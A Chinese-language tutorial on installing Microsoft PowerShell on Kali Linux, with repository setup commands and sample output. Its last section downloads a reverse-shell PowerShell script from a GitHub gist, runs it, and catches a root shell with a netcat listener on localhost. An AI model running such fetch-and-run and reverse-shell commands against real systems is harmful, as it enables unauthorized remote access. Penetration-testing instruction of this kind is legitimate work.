在Kali Linux上安装PowerShell

Kali Linux上安装PowerShell

PowerShell 是一个微软开发的自动化任务和配置管理系统。它基于 .NET 框架，由命令行语言解释器和脚本语言组成。

PowerShell 提供对 COM 和 WMI的完全访问，从而允许系统管理员在本地或远程 Windows 系统中 执行管理任务，以及对 WS-Management 和 CIM的访问，实现对远程 Linux 系统和网络设备的管理。

通过这个框架，管理任务基本上由称为 cmdlets的 .NET 类执行。

我们首先安装必要的依赖，在默认情况下，大多数依赖项应该已经安装在Kali安装中。

apt update && apt -y install curl gnupg apt-transport-https

接下来，我们需要下载并添加公共存储库GPG密钥，这样APT就可以信任包，并提醒您有关包签名的任何问题。

curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -

添加了GPG密钥后，我们继续将microsoft包存储库添加到它自己的包列表文件中/etc/apt/sources.list.d/并更新可用软件包的列表。

echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/powershell.list

apt update

最后，我们继续安装Powershell包。

apt -y install powershell

PowerShell

包安装完成后，运行pwsh启动PowerShell，向我们提供熟悉的“ps”提示。

root@kali:~# pwsh

PowerShell v6.1.0-preview.2

Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs

Type 'help' to get help.

如果您是PowerShell新手，您首先要做的事情之一是更新内置帮助，这可以通过运行更新-帮助。这可能需要一段时间才能完成，但实际上只需要运行一次。

Updating Help for module Microsoft.PowerShell.Utility

Locating Help Content...

如你所料，在Windows上使用PowerShell时，您不会发现所有您习惯的命令，但是所有的核心模块都已经存在，并且代码正在不断地开发和改进。

PS /root> Get-Process -Name gnome*

NPM(K) PM(M) WS(M) CPU(s) Id SI ProcessName

0 0.00 5.71 0.03 1073 072 gnome-keyring-d

0 0.00 9.80 0.19 659 649 gnome-session-b

0 0.00 13.72 0.36 1089 080 gnome-session-b

0 0.00 110.06 3.36 778 649 gnome-shell

0 0.00 277.15 27.85 1170 080 gnome-shell

0 0.00 11.77 0.09 1199 075 gnome-shell-cal

0 0.00 77.79 4.58 1381 080 gnome-software

0 0.00 36.58 2.03 1646 646 gnome-terminal-

使用PowerShell向Netcat侦听器发送反向shell。

root@kali:~# pwsh

PowerShell v6.1.0-preview.2

Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs

Type 'help' to get help.

PS /root> wget -qhttps://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1

PS /root> ./mini-reverse.ps1

root@kali:~# nc -lvnp 413

listening on [any] 413 ...

connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 59006

id

uid=0(root) gid=0(root) groups=0(root)

uname -a

Linux kali 4.15.0-kali3-amd64 #1 SMP Debian 4.15.17-1kali1 (2018-04-25) x86_64 GNU/Linux

我们认为值得注意的是，微软的开源PowerShell不仅不断地更新和改进它，而且拥有一个公共的软件包存储库使安装变得非常容易。